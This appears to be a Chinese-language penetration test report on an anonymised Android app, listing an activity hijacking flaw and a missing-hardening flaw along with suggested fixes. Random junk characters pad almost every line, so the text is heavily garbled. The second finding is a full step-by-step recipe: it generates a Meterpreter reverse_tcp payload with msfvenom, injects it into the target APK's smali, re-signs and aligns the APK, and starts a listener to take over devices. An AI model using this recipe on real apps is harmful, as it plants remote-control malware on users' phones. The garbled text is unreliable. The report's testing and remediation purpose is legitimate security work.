* \ q; P& s1 H- L$ W, R) p+ Y- {
6 ?/ J4 V) A; U1 X0 `( ]
2 @' v9 q6 E. j$ F& L5 i
" |0 D1 C% g- w) o% Q
% X ] P" C9 D+ [ ; S9 j" W6 | C6 I
7 |6 \3 i7 [# D$ S
" r( ^2 {$ A) ^: t9 J5 `$ H2 d3 O$ k/ S4 \4 m
U) f9 ], I0 E, r6 T
' B# J+ [, b; q: d 2 检测结果 # m+ q J! I# U8 s
. ]4 n) U& c0 u2 s3 E! I
3 G1 ?' J0 a6 ]- X+ p
5 W( M6 ?+ q8 O8 @0 _- x
6 P i" `1 s6 _6 K! o; ]# m( N/ P; X( f4 [: h, p
2.1 某某某
7 ^6 M7 L$ r! n" s6 \7 J( A0 C+ `7 c; b! _% r) T
1 L0 E& V2 d9 [- t# F3 T) @6 ~ @( w$ m
. v0 t, `2 V( H ~ U/ h- e: c9 f, h8 x Z p/ b F
2.1.1检测目标 # t. G7 u/ F+ x- X
4 B2 K h9 C* s* Z3 B2 o5 w- v
# d9 X- ?, [( @/ N
9 o6 J1 V3 ~+ e; D$ u: `6 t
4 a- o. |/ R! C
/ }0 p% Z( |. Z, c# B: K 目标地址: 某某某某某某APP 9 ^8 Z" K) [2 C* u
/ {) p" k, B0 K) C/ E7 ]! Z
) z u/ s0 h$ d: C7 O% C! n6 C2 r6 \ A
) E+ N; X7 {9 `) J! a& W! y+ t: s% w$ ?' i2 B" `! ?
2.1.2检测结果
& }, R" l/ H% W! H% M8 X9 M {1 C$ D% |6 D7 S, m7 v8 Y& u5 ]6 q
, ]: c2 I. E( z9 C/ A) Y9 a4 t, F) i; d
1 S4 h8 N: \' A
7 A* g2 J2 v; v 2.1.2.1 % o8 n2 z; f5 g% e1 ~5 V! G
* b( W8 \+ l2 I
6 D% @4 k: @' H* p
' K) k, B0 _/ P% B , t5 c( \8 }: G+ E" y7 h& S
h" ^" b. i, h/ Y/ `# F% q' p5 F
漏洞链接地址:某某某某某某APP
) X; I; [( I- d1 F7 h$ h3 e9 B
( p) ^$ v+ _) P# X' I8 W+ p+ }5 ]
5 A0 H7 {- h& _
+ R- m9 a4 W+ U; E$ ]/ [; Y
9 `$ B3 G8 x3 o( }7 k
' x8 q& U6 H, B5 i! J , U+ A! V# t: O% D* ^, N
" X- ~5 L5 r* Q2 p
5 M1 a! q- F* r) C% j( k! _' e
! v% L5 J2 {" _3 ^% i, h
# a9 j" { g7 u2 _0 Q
/ L) y1 e2 O8 c+ P 漏洞分析及取证: % m8 E% I% ~# q0 C6 G9 q+ P* U1 D
[( H. N( X( y+ G# b
& r m9 |/ J& Y5 p' M
/ h7 I: `: H: u3 u/ A7 V) ` , n, P" U+ E* U% L2 z' {0 ?
8 Y( W3 R- ]1 P1 d) O
通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图:
- n. O" W; C# h5 I, N+ o
2 z; F$ R4 R6 w9 u: K
; v; R9 f. i: _( t3 X. {- o4 e
Y c# ?5 G( G/ A" c" N
: q3 [- q p; j' a5 C
$ U5 ]. G9 }8 t$ p
! I& T7 m8 F/ V8 u* m
5 n5 D1 U B& u
% w b6 ]; i R5 c8 h
$ L/ P; n- q {* U' C9 P3 L
& a0 w4 Q9 r0 _6 L5 W- t
U+ _, e+ t8 \/ i 7 k/ f! f$ x7 B# |+ m+ m
, a: p+ e$ c6 b) D
( P$ d2 O6 Y' Q) t- k
- \' E$ ~+ X* Q, }* X
5 v7 E9 r2 k9 c( x k& O
- N" a6 `+ L$ U' p5 Q% A
5 A7 p {( q9 \, H/ B5 M& w; M5 S; T- {3 d* ~
& J m1 j1 T9 i8 t, f; d, ?! D' x9 R0 ~0 u; K/ K
4 p3 H `9 q$ P# p5 f" r
( `6 m7 E) X$ X
}0 \, [! `/ Y0 D
' R1 S8 r- B! j8 N( N/ r( j3 m
% ]2 j* H/ x0 W2 J, n2 B
# N" d3 T( L( X, I& E
1 I8 k% x5 D6 w, ~! Q) e/ T; w X8 r& e- Y) l2 P2 R6 G5 j
. T' ]8 \8 |0 R6 \; }5 g+ E
) u; c; |: D. b! E3 b* `2 V# S
) l; E6 Y( `, J
3 @# T$ q( U& x, E/ Z. M
; H; R V3 y, ^6 }
1 m7 A- ^" A* I1 n. D 漏洞危害:高 ; y1 ^, [) x( ]* u( M# c
* ?8 H6 y( y Z4 y
6 C, }; v' u8 R
9 c) d( x- L- n6 D# ` % V! {- b5 H! {4 R/ U* M T: e* J
8 M, w* @& A) V. X+ s4 U1 ~( h
2 e9 y; Y1 D' M- w' H' G7 a
. W5 \9 F0 a& b0 D4 ^/ D5 u 3 D3 k& Y( r6 K2 J
- Z8 J' u; S, T; r/ y& E5 L0 n
' J: N, a8 ?( L; E4 n y: j+ z& t0 L) ^
1 t1 _* f! C3 `$ A+ j9 u6 x. n8 C
# ?+ i- N! v0 R. S @7 Z+ y6 l D; [; y$ o7 Y7 |. z. Q7 r; P. P- y
严重程度 4 I3 R) L8 b- [' y+ l; F
0 e% J9 I1 ]$ a8 { % r% s; n9 M% V. P$ s1 Q. t" v
# q$ l0 \8 @1 q8 p2 _: x
| 1 Q U6 e- e- F O7 h
5 s& r- n% h g# A$ O: X
2 `) v, `, `0 A) _: M
0 f* w4 k N! g3 \* U/ u$ I 4 w' w, \1 s1 n8 t; ?
) b# ^( p k/ w6 ?; F: u 高
9 \4 e2 u+ C, ~2 Q3 n& @
9 _( ?' b3 S* e, z3 [( j
% s; x" c9 l i# W s- W0 A' T$ f( N8 s" j
| ! n& L6 s0 e# k4 F" z8 B
8 z3 a. N1 C, Y9 \+ ^ " |, G. H) l3 V8 d
U" y. p0 H d, t
, h1 w. b9 _# d3 s$ g
8 F9 [" d( g4 }: \ ■ % T! E& N- a+ i% B% g6 b
3 U2 }: \ N: s9 g* V# {: I& R$ J
# v. U) O, T6 A& Y9 o0 x) v6 @) z h1 q
|
: v( {5 h% `! _9 i9 O5 q' I2 O6 C$ Y- _7 L
0 Y. B1 w/ _6 u7 f& g z
8 r' Z& \ S3 ^2 x/ ]1 _) m0 F" Y
! W5 t: Q( U g! ~, a5 W
+ |2 x; S. m1 U! Z5 g 中 & }8 }. l( [4 X; {/ H
, ~9 X9 Y0 I0 D* S" W. c' u
' s+ Q: w8 A5 Y) @
7 m: L- m2 p' K" O, c" A2 P2 M | # F) ^, v. t! B: w0 G
* I o- x/ E0 T) ]' @ p2 \ `
/ `/ K4 i4 C4 |/ e8 u8 y: U' d8 }' \8 g, h
! y5 @8 Z. O6 C9 n: C3 e, R
% ?, i8 U* u g5 \
% I. `) q$ c& z6 X* l {/ p7 D9 D# a+ K: `7 g9 g
' G( `3 P1 x+ ]# u- ^& J, j0 a& g) t$ z# D
| 0 V+ j% q/ N5 ^6 i7 O% J7 v' |; {
3 A$ B# V7 r$ U- k& N9 o! C7 j
$ h# ]/ s7 \1 c0 c3 w, _' D; D; z* M. x
' M' g& a {8 Z2 E; a. a& l+ |) A5 p( b" k' @9 K2 \3 s' N
低 8 }: R& }8 y* v$ o) }: i( C
. I5 w n' i5 I2 F/ `* N + c; w6 r |7 V8 [8 Y
' J r% d4 p2 s, d! ]1 f! t" q |
, L" F) {$ W. _9 s( [' k3 t% Q1 L* n9 C& u; D) `
6 u$ v* U, r* H' a Y5 F) L3 ?
' [$ ?. J3 F! v% b, a( h
4 Q, E+ R7 N6 ]. o1 x- Z
4 b) z# k( F& k' f, f& T2 I
$ D& A1 N( Q+ E6 N/ w" i7 ?0 q W0 z- Q4 U- Z
( R5 C& h$ j- P- N$ |
4 v6 J u5 J% Z- V4 d9 U6 r8 Q | n- k" k# Y: M- X2 C/ R) E
$ w) M7 a) V5 P, d" Y( O8 z3 |
! |' ], e& U, d% R4 H: h- r2 K6 O% X( L2 |# \5 y' f0 z6 g" f% y4 O2 r6 @
5 ] r' _7 V" z" G" N( w+ ^
2 u) L( q7 F- y9 U/ d# p
& Z* _8 {0 R) M+ r
: F3 y' P9 g1 S6 k & q( Y1 a0 k! ]5 L
( C( o1 t$ G& K# I ?- t9 A1 U9 t' L3 ~1 M
' K# F3 p4 ~8 t9 ] 8 e6 q. B) {8 W O ]- |# r+ q8 s" S& z
/ Y! E, W9 u# O0 v# D/ w8 ]
0 L1 `& O O* s$ W* D8 M1 Y# p# q+ \! w G3 y
% C8 x2 b- S6 r& m8 y8 J
! i3 t, i' X: s* B* v+ ^9 i- t" v
修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。
( i0 j- @+ j( T6 H- o' j/ t' Z! @5 u. `) L+ x; G
) ?( W/ F$ d7 }, d3 `" y3 F5 a# y
i; q- s7 n3 c
, I* \/ x) C& r; X& g" x# ]- ~, g
) N3 Z/ E' F# O1 j1 L
0 [- H O" |% D9 D+ f4 ~7 O, M9 p: f3 V! j9 j
/ }# G% y- X% S+ z) g: V, b; P4 ~8 ~
- g& p, _. E' S5 M7 C # z# D' M0 a& f3 Y9 j) r7 a: Z4 y% V
0 m' U2 N7 `$ z/ Z: e8 x9 a9 U
' N2 ]. d1 I8 |7 d5 u( _1 C! A* l3 D6 u) p5 p( `
" f% c9 G' a" q- J9 k# B" h
, s9 Y" _# Q9 C! S$ l. ^9 A
& p% g* Z) N; ]1 I) g6 L
% g* H# r8 M1 W0 R 2.1.2.2 % J; B) u! J- l( O, o
4 l7 z+ M/ u+ S
+ ^8 f; `' R5 J# F b. f
, n/ _$ I' i5 Y$ z
' m* J5 i( o: l) F
5 L, M- ]2 n: Z8 W+ C" [9 B
漏洞链接地址:某某某某某某APP ; y) d V, F! Y
6 O4 V/ c3 e" u N9 [3 Y
/ m" D J0 F) N$ v- I
8 e4 h7 z+ E, A+ B! F1 z" u
u! k9 p0 S8 ^5 V3 Z) S' b: O4 b6 `6 q- o, i" _2 t
漏洞分析及取证:
6 N4 v" p: G) I4 l3 m; q+ A- N+ n1 K! L8 F6 }
2 i5 [, \: y ^- G$ [
5 [8 X: |. G( f! S& ?
- S# o5 Q1 O/ Q7 d
$ R3 a2 V( q7 D2 [. ^* E# o5 `8 V3 g
通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: . Q0 M* g$ Y, S: X/ Y# q& x4 t. g
2 ?% p# e* t1 U! R: y
, r6 B( P" D: c
9 m& @& R/ S# b9 J! M" `' J8 s ! f+ O/ d% s; _
6 o. g% D \. ~# G
用Metasploit 生成木马 apk " o v6 |* J( y" x
s9 {% Y* ?- [! m
' r9 j- r/ f: L6 E. A
! u5 _, K/ f" Q 5 D3 p) D3 P0 i$ ~& Z0 T- t# X
4 ~, i2 @) f, }8 j msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 4 Q7 h3 J, S" D, P" c' z, E
3 X4 G8 z& j* ^% e# y$ |
9 w: {1 A5 B$ d( d, y
& s8 ?5 U9 Y4 A) I0 r
4 P" [" D8 ~0 l- V
) J, o1 w: R4 t 反编译目标apk和木马apk
) ]8 X ~; P9 p0 y- ?# g: n+ t
5 O$ L& _# A! X* w3 [
3 U0 X! Q! n0 U/ o7 k! C- H; Z+ F# Q: `1 q/ D( f
2 g3 W6 e8 [# w8 W) z+ i4 p
3 Z1 G; d; h; F+ R9 m apktool d target.apk
, O6 G1 B8 _: n. q
6 F! l! D0 G4 X apktool d cockhorse.apk ~2 M" ?+ W! z& G5 {9 j6 l% a5 I0 c
+ B0 F# ~' a5 c$ K
# ^+ w# w1 }4 u& t0 w% ]4 k1 Q) }7 r- h
$ c0 ?! B( |% k6 W+ M
. P5 r6 T9 F) ^/ r) \ 木马 apk 注入目标 apk
- \7 ^: d1 V- q! y/ d6 X9 R! w3 k& [. ~+ ^& n4 S1 Z o# K
# F* o5 h& q0 L! P1 c
( o( u1 H# c- D9 I - D6 T! W5 }6 l0 m
% ?) n6 ~6 A9 f/ a6 V 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
: Q P+ X/ q5 @2 E& _: P) Y* W7 b, y* t" `9 B/ u) O
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
; P9 J( k- l% R* z
0 z) H! g$ Y/ j
, W4 @! P: O4 i: N$ g1 E% a2 d6 l+ P ?4 r4 W1 N4 e$ @
- K l4 V, J' I8 u ^
Q# Q! }5 Z; L0 J
将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复
+ }) {* D* }) _
t; G5 a# Q- y
) b5 g$ W* p, e# I! z. e2 Q2 R7 E' r; V1 F! {9 |/ J6 E, O
" S4 C2 z! w, Y4 j% g( F8 I, G A
& D* v* h) p2 i C3 e/ Z5 l
将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下
; M$ R* t( f- t+ s* _* B4 P5 P& {3 n
! t6 T; M2 H2 B+ `3 q& T8 \
+ \4 t0 }: M4 l8 g; o" j 5 V2 M3 O% Y$ c2 S. {
6 n' W- c9 q- |" D9 q2 j8 \+ F" g5 V 回编译生成最终 apk
I& D& _4 m4 a5 k% R
5 S& Z3 P' Q* s, n! M+ Z. u) X6 B% w
2 l) U# Z$ w7 g5 Y t. I' J) R! g7 P8 @9 J
& k9 I$ T# z1 j9 }' W0 I( r) r6 Y# a0 N; Q+ O
重新打包 * C9 y! h- ]+ m: N8 i
1 s% O1 }: b$ Q* p( O; g0 m# o/ r+ g% ]
5 P& `+ E6 U% l: v Q
' F1 X4 L% I* H7 o+ N* n
( g) W3 L" y5 d; }' G6 ]0 a! L; T8 C) \
" f% Z0 N# H Y n! W% I) Z
apktool b -o repackage.apk target_app_floder $ |/ y* K* z; h8 C5 k! I% u
+ |0 K: S' [ s/ m
. n5 {1 M7 n) E+ T& Q! }7 ~' j$ z
: n/ H# K/ H- l. m: W
. h8 `# [" f7 A& v; x. u/ Y# t
# c8 i8 `6 _2 v1 y8 y6 } 创建签名文件,有的话可忽略此步骤
4 a: O# }2 n" _* A- `, m6 L- K! ^4 A& e5 ?* y
/ r# c1 S5 n: d( o* e
. T: Y$ y n K. G, w+ {) u
; y! a* b% n7 }9 c% I/ W# r4 K V! G
keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 ( |8 r: p' V: H/ N% s
5 u% l2 U# p8 _4 {& j; K
3 Y1 K$ B3 M% Z% ~1 W' R* l4 u2 J2 c0 V" l0 H
& W* a+ S. `% s) q' Y! m( g
* X' w- K: \1 [' c: @3 Y
签名,以下任选其一 + V8 Z9 o9 m/ s" f& H/ L3 ?. Q$ }# J
% a" I' u7 m! }# g
" R0 u$ E# A6 `/ M1 Z# v6 z8 {
1 s$ g N6 D2 F% [4 t
7 Z& g4 n6 R8 X2 e- y
5 g- A& @; F) U- ` jarsigner 方式
8 f+ J: s3 ~( r* H6 R* { Z: t
& w. ^" m4 |, n$ E$ `1 V
$ L) B1 f" j! U0 a( d* J2 J9 y4 ]
`; a+ W0 J' I6 k- J
$ d V6 c5 J3 K! D1 ^ jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname , v4 ^- ~- J3 c
1 t8 {% }0 r$ n- H1 u
7 o. V V/ [) ]- M/ k5 V
# T: W$ r1 y, b% |' y4 C: J
/ X$ K/ k* u8 V) B# q2 ~# _
. s$ L8 b* P/ J! q: k apksigner 方式 9 t: G! D$ d; t' p( M4 U# }/ k
9 _ }* |% G3 i# A0 a
w. q! T/ O" e. k- F, v, P1 V1 c, M$ U7 ~5 X- c: z
0 W* l* \- R4 W$ X
5 ]0 [ r2 @3 t- e
apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk
; q- d( R0 Q$ o/ g. Q3 }+ {, `
& y' R* a# F2 y( [2 l# L
3 a; N4 V9 o; S1 V, v1 }& a
8 u( X: L M7 Y% l8 q3 s
4 s, e2 U( {! m0 W/ G2 A( A$ x( W! l+ k
如需要禁用 v2签名 添加选项--v2-signing-enabled false
& h' z% U5 O3 p8 p# Z6 ]9 W$ s
& Q( N9 S* S1 K
7 c$ @, w d1 }/ Q: e
. b- p, G3 h ?0 n+ T+ _
3 m1 z, s: Y% ~: B
2 f8 i; {' t% \ [ 验证,以下任选其一
& J$ D8 I/ g E" D, c
; r* u$ T9 s# {8 N
% a$ Y0 T/ Z- _ `" J6 x
* l% M H- M, n- D/ _/ ~* H
0 Y% O/ {8 Y% {) J* U1 A+ c) O9 C8 V
- y) K! ~2 P$ j- g9 B
jarsigner方式 + Z: Z' r: j7 ~7 t
3 h9 ^ G" P* K/ }* {2 [! W3 f
7 h+ b& i4 C; z! M5 u/ ^ \ Z. N! {7 y
- K+ Y$ ~- L# x; b
/ p) |' Z1 n. v$ [+ g jarsigner -verify repackaged.apk " P- z6 m; V8 Z9 b$ O0 j8 A0 S
2 T9 Z; i0 \6 K' ]0 ~5 X8 T
5 R6 p( T$ W9 j& L5 b4 V* R9 B3 V9 q) m. _% t
* ~8 A5 A% S- o: p ] C& z" v) x- R
apksigner 方式
! a+ ]: [! W* E/ o
9 h( Q- i0 ?+ o. y. T$ z
. D6 Q" T( q9 }; r1 E
: p( K% ?. A8 E4 S* [
! }% ~& V- h; \% p* \
8 J+ q& t* w, d apksigner verify -v --print-certs repackaged.apk 1 C& M( L4 ~( P5 O( R0 l
& u. [& ^7 s8 o! a
% S" T) A) O2 K8 X& P4 ~: `" [
: ~- F6 X* E3 ~, x
; E, Q2 ]6 t6 X' P: t. s+ H5 @ v7 k/ X% R# E
keytool方式 ! t! m- N; K: B- p4 @9 Y* j
V4 b. C& s% b, R9 ^+ A
- ` ]% q% N0 {# v+ Z7 Q
% M, {# ^! A; \+ y* N6 v h
% {2 t {$ g. K2 W4 P$ Z
/ ]2 s5 \! m Z; s3 b$ A- N' y keytool -printcert -jarfile repackaged.apk 9 i* q$ ~6 P- s F
+ J; {" G4 ]( ~/ Z7 J
+ f& a! Z- X. Z4 ?9 h6 z* Z" \
. i% u" F4 K0 E3 ?: w) T
% K( ~& o% V3 L& g* L3 X( r, u# K' Y" y8 N0 k, ~8 D
对齐 9 M" e7 G3 C6 {3 p; v2 P% e; n
0 W) c% R+ \. D/ C2 Y& m6 c2 j
$ a! f: v* Z2 a$ \( I3 H
( Z2 V! N* ?* a( C. P: Y
$ \. X- Y: u0 E
, \" R4 V# w8 T9 ^8 K 字节对齐优化 ( H: d5 _" z5 O( Y$ k- f
3 o; g, ^" K! `' I
! i @! f, M, A$ W0 K! S
) K- A1 P" M3 H7 V
% K& ~2 X" O6 ~ t. J5 i; O5 N
# h5 U; L( N* ?* Z& i/ V) ~( s zipalign -v 4 repackaged.apk final.apk 9 _7 ^( u, j9 v d
( M6 P% }7 @! F: N4 K# f0 e
0 ?- D) F- f: t+ v. m- A I
4 R) T9 W5 H3 \$ u$ F$ d! @
* N, } u0 F7 [( _7 m' f
m$ |9 ^0 v$ z* {) p8 @5 {
检查是否对齐 - O8 y' n* V, M. p, ~8 ]
| C% p( }& m& P$ G( r& S4 u0 l+ {
' @, h" w6 y" S3 T, h
5 V4 J8 n& A% i% k6 ]
7 H( U4 @# z2 h
% o: m/ r; u8 M9 n# D% j
zipalign -c -v 4 final.apk & d. \7 _* M* `
1 {9 |) O* @. o9 M
+ T; h5 N' n9 [* v4 M* |# Z* j5 H6 I9 }: Q$ f8 M9 @: O
* S8 A+ o$ z" P; C
/ P7 p3 @/ @9 X 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 " O* `9 v& P; p+ ~- N
- {# E* w) |* R% Y+ E( U% Y
3 T* L* E. a& Y% ]0 t: y
6 p2 y5 d1 Q- C- D% M8 j1 { 1 f) I1 g1 v: k, w$ |6 }$ |
) c- S F" G6 T% A& n 启动Metasploit控制台,配置参数等待上线 " A$ M. c: F9 ?+ W- g/ i
m3 F" ~7 d) m( z. o
2 X! V; k8 \) J( a8 O/ m( Q
, A2 M, ` N6 u* E
( r( v" X' P7 u" P6 D* @; @+ f+ c7 V
在终端依次输入如下命令
2 G( j3 C5 E k1 k
c" {4 N' j" Y$ `' l: x
) k- }3 X0 H$ Z! l' a, y# q5 `( X! U( R% L. H( D
" R$ \; \4 q5 Q) t+ Q, k/ u; s! r) N# U1 M; E* Y3 m4 R
msfconsole + M' P) z. K4 ]4 r P4 V" ~, B' t
3 V _3 O+ N& ^$ }
5 ^1 f3 Y6 \/ I. k; j$ Y, ?& \$ Q8 a. t% i* V+ Z2 _2 w$ j+ U
+ D0 o; m) j: t o! z5 Z' E4 n
' W" F: A) D) b$ p3 m: w+ P$ v9 b use exploit/multi/handler & T7 V0 p3 t: R4 `1 h
# [4 }( }# o$ J; w( F6 w9 i
2 `6 \+ w. {) ~% S5 t( O/ |
+ Y- ^: w9 h+ n, K1 L; ]0 k, x% d
4 q% ^, Q* y6 Y$ E; V1 v8 m# S! R
2 q2 D' b; P M9 [* P$ s* P+ M set PAYLOAD android/meterpreter/reverse_tcp 2 ~3 |5 }2 c; g) s
& l" {' W; Q% A. K
# b |+ I; q4 r- w) }7 u0 y% Z, w) |& q0 g
% P# G4 r. N6 Y& F% j: s0 w# c
$ [1 z! F1 q, h4 {: P. n set LHOST 192.xxx.xx.xx 9 j$ s- T+ {4 v# G2 q+ B/ `% d
$ f# ~! l! ]! p3 m9 \5 K2 {! R
; a, G; e, |0 i9 M3 }3 D/ h
. l5 q" p5 {" ~* ], B( z
$ D% D; E" a+ q8 z+ j4 G9 {3 t0 o1 y" p: f( m+ F6 {& N$ A
set LPORT 4444 , K1 n8 f# @' i
, o Q4 \8 V& t; k, W a
! e2 `4 s' j, x9 M( }
8 \6 C9 D& R' B5 O& ?
$ C( [9 M0 Z6 [" U
) T' o! e& S; a exploit * [/ m' ^# ^1 W. D) Z; L6 Y+ V
9 ?0 E |$ `9 O" X* G/ J+ v! L: p( u
) l, e: |, |# T% J
# F N( W" B1 {& M- _( q
8 ^. o& Z9 H7 X* o& v. h7 E
, a2 b' Y7 K0 ]5 P' _" ?
之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图: % q$ d: E' A4 l+ P
/ O5 p3 K6 ?. w0 [* ]0 W
' i' @- {5 w4 U* m( K4 ?$ T
% @; Q* }5 B B; D& n
, ]! R6 u1 b: V! i/ {7 a& F0 Y$ N4 i5 h8 a+ O4 o: @
漏洞危害:中 , l/ t& N3 @4 |0 x$ E4 _
" W1 Y5 R; Y% |
. a+ t1 L5 p8 Y
* `3 W/ [5 p) f+ K' |& y / e% K8 [) c/ _& Z
1 U$ a& z; \ S# Q# a
! G/ S, e" c6 V; t. S
. e) K* u& k6 Q% v* L/ r y
" o5 K/ ^; X; s1 O0 n0 T- R$ y( m# ^3 r. f: X+ ]) m
' W! k$ M5 h) r- H3 Z( u1 Z% {( N h9 q. ^" \! f3 b& v/ \
, P* J' e9 n% ^# j' [! i; t
' ~" P e' `: ?3 K- C
! |7 `( u6 ]! s0 L1 ]
5 f' ?4 e* ^% k$ J$ | ' Q. a: G5 v* V
% X+ g' q2 M8 A, z' I' a 严重程度 3 \' m: n" w+ j& B3 w" t
3 x" [# m! `. V/ H% l . j) N2 v M% X d- m/ {% }1 S
3 s6 F! d3 f( Q, {2 i, o0 f7 a# T
| & R r8 q+ {7 i, s" ]" e6 d2 I9 x/ }+ O, b
- [3 K- R* X! B+ f
& h; Y# F2 x/ t2 M! q2 k; \. R# R
" L1 q: e4 O |5 H e
4 Q3 k5 j$ ^ R! }8 N" C, W
7 P+ e# H$ c" s& `3 R
高 ( `! p: \ {1 y; H* } S6 z
: N0 g; Y- n! x0 T; V0 d
0 T/ K8 c$ G7 x0 B& E+ D$ w. K
1 L5 A) ]1 L2 {. h3 o6 p9 q- M
| ( \; C/ @3 g( x- g0 ?6 O: }4 Z
* m6 j& c) c7 J5 K3 F ) q- A; _! p' ~8 Y: E4 o; h( B* {& v
) X; p0 z3 |' }! D6 n% b9 `
, C# d' |7 l# v" k9 M! \9 |$ z2 [- w( w/ d* k
■
. ?' H/ w" [( x" y1 r$ e. e
3 D% e* n$ G: o3 W ( c& o. s+ ]7 c" R$ o- A' \
, w, q: n7 P2 q6 t% |) j, A4 K. m) I |
: s! \/ Y! i8 k o& D2 t7 ?- ^, Y. b
8 Q1 m8 K2 F6 h# R) x2 ~: H
2 B( D+ v' \3 z: h, g7 p ' U5 N( q1 |4 |" L; i0 a
' r& A" p$ q3 O+ h 中
6 e! F$ f+ p: v9 v4 C. \
6 a2 X4 D, p' ? ) T/ j% B" _* p' i. N* T+ C7 [
3 p' P9 c. I; U, r% O( g) }
|
! H1 u* A9 S" e6 [
0 J- W/ i5 ?7 x6 [. I- f
: C& a' ]# d3 U: C
$ M8 ^* l) k) Y 0 b# [$ k& v& ] {/ ?
2 _( P6 d1 M" k/ E% x: t2 j $ w% _* |- v- M' q1 h; I1 l* [
2 _ e' \0 d2 m) E, Z y
* J( U6 [- a8 Z% b4 O& N, f9 a0 W; l" V1 u
6 |8 u1 F. |! Z I/ M% {+ D6 P
' B$ R. s9 D! C. C( i |
/ n3 J( Z/ t9 z! ?, t2 Y% G6 `- [' ~' `! R; ]5 Y2 \. O
. Q/ o: T) ~+ g( P" u
- E7 e- I1 ^, f2 ?5 ?/ B % Q5 `2 L. L: t& {5 L; F* _
0 \+ T5 i5 q5 v# i% G 低 7 r) B8 d* {6 Y1 Q W
/ G$ `# k: M8 n+ }- A" Q2 _; [ ( X/ g+ p8 w2 M5 R B
3 y6 R8 G' T3 Z, K
| / M; i! N- z3 p9 D! `# q
* x1 @8 q* U. W3 E9 Q" z9 \: g 8 @1 u% ~7 k" B" k" Z1 Y
' l5 ^7 F9 ~ B6 F, C
9 }7 S( R- A' V' g Y
( K2 W& `1 ]9 L, D9 j# T
8 ~( q; T( J) w* V8 p2 x
7 A; `0 e% }0 [
5 G" m5 I5 E/ t$ @: ^1 U( ^1 \5 x" @
1 C# t u* i* q1 s/ f, v9 r5 ?. Q* A
- _$ A1 [* z0 T7 C4 _3 v$ ^2 | | # N- u# Z5 O3 A I8 m
; K+ t0 b. |4 U3 m: r7 B4 m9 I7 E
$ v) K4 C! g: \& d# N
& j- W' U* ?, S& L" @4 [: M
) t& i8 S, K& a# K9 O5 S
2 r( v6 U% A" _3 Y7 x7 q
, {1 K7 |) {- N6 v
/ ?5 x( d( W' k3 |
6 M) n- O1 U1 ^) Z" V% q
- _3 q' _1 W* b t0 ^
h5 f | c5 J9 _$ Y7 |, ~1 I |
' R% m6 V7 @( K6 N - M' \. D7 n! b# D- I5 k# C9 `
7 a# S, f& M; O' m6 W4 o+ o. [
5 A9 Q- T$ [2 g3 J; I
, x; F* I" ~: b2 x4 F& l, ] 8 J7 b$ h2 Y( p8 a& u
1 O( Y( ]+ `+ J( X: C n; ], V. {
修复方法: $ e8 p( F& a- T- l' ~* p
9 Y4 n* |9 z9 {
! \" I6 `# W( v! W% s% C4 D
4 x! f' C3 u* Y1 _& H5 v( ^# ?
; h9 a; m/ Z6 d# `' Z# g/ _- j
- D! X) }" ^1 O* g
1.在 APP 启动时应做签名校验防止二次打包。
7 n3 h7 j3 Q7 r& }
( I7 n+ a% l u. }! t+ J
2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 / q: d! y3 a. V) G
" Y9 c, P- O9 L& K
3 i \1 T& y k7 G E8 a
8 t' p5 f4 {4 q) {! p l & Y) U4 h( R% i. B3 e! A& i5 X
2 V8 `( }, y& G; p
3 K; Y% {5 i1 G# O! z
$ f, Z. ~! j1 _0 a, \, d
% @4 u6 i( F: ]! @$ R8 p2 g
, m1 `. k8 `! E6 J7 f) i/ J
* V" n% d3 n, z7 g1 F# v
- t4 ]6 P1 H/ D2 k
" P" q/ J# r; d5 H) S2 R f0 ]9 [! ^/ F9 v0 \
" Y" w) R9 |0 [
. _; n- W& |0 U- J1 k
( t9 F) V! W+ F4 v3 |" B5 n3 e* u
- L% F7 p0 d8 z0 }
- y( k8 Y3 S5 C! ]) X, w( c1 Q$ [9 B; q% @% x# O